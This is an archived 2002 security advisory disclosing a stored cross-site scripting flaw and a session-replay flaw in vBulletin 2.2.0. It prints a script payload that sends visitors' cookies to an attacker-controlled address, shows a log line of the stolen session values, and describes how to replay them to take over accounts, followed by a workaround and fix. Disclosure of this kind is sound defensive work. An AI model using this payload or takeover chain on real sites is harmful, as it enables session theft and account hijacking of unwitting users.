Fairly serious vulnerability in vBulletin 2.2.0

2002-02-01T00:00:00
ID SECURITYVULNS:DOC:2435
Type securityvulns
Reporter Securityvulns
Modified 2002-02-01T00:00:00

Description

This is my first report to bugtraq, I hope this is useful. This has been tested on vBulletin version 2.2.0. The vendor is CC'd on this message. I would imagine this applies to many products, not just the vbulletin, which I would like to say is more secure than most.


The Exploit:

It involves a few different parts, firstly some malicious scripting and then tricking the forum into accepting data from the wrong place.

First, I post some malicious html in a reply to a topic that allows HTML:

    <script>document.write('<img

src="http://my_ip_address/'+document.cookie+'">';</script>

When someone loads the page, the javascript echoes the contents of their cookies into the image source tag that points to a webserver on my machine, resulting in this kind of line in my access log:

    GET

/bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvi sit=1011983161

At first I thought this was useless since the forum uses a one-way encryption hash to protect the password... however, then it occurred that If I log out and clear my cookies, I can add these variables into the url of any page and the forum will use those variables to log me in transparently, just like it ordinarily does when you leave the forum and come back. So I added the variables to the url and bingo, it logged me in as a moderator of the forum, who was being my guinea pig.

>From here, I can log onto his profile, change his email address to mine, use the forgotten password utility to have his password emailed to me. Obviously in this user's case this is fairly useless, but if I had caught an administrator's cookie info from the malicious javascript, I could get their password, giving me access to the CP... and that's that.


Workaround:

Disable html, make sure that there is absolutely nowhere on the page where html can be echoed onto a page. Disable the [img] tag for good measure.


Solution:

Ensure that $bbuserid, $bbpassword, and the rest of the cookied variables are coming from the cookie and not from GET or POST data, by using the $HTTP_COOKIE array.

Harry Metcalfe